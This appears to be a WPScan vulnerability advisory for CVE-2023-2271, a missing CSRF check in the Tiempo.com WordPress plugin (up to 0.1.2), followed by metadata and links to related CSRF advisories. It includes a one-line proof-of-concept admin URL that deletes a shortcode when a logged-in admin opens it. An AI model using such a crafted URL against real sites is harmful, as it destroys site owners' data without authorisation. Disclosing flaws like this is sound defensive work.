Tiempo.com <= 0.1.2 – Shortcode Deletion via CSRF | CVE 2023-2271 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack

Proof of Concept

Make a logged in admin open the URL below, this will make them delete the shortcode with ID 1

https://example.com/wp-admin/admin.php?page=tiempocom/app/admin.php&action=delete&shortcode=1

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

31512f33-c310-4b36-b665-19293097cc8b

Timeline

Publicly Published

2023-04-25 (about 2 years ago)

Added

2023-04-25 (about 2 years ago)

Last Updated

2023-04-25 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

Wordpress 3.3.1 - Multiple Cross-Site Request Forgery (CSRF)

Published

2025-04-10

Title

Restrict User Registration <= 1.0.1 Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-04-05

Title

WordPress Comments Import & Export < 2.3.6 - Cross-Site Request Forgery

Published

2022-10-30

Title

Appointment Booking Calendar < 1.3.70 - Feedback Submission via CSRF

Published

2023-05-31

Title

TS Webfonts for さくらのレンタルサーバ < 3.1.3 - Font Type Settings Change via CSRF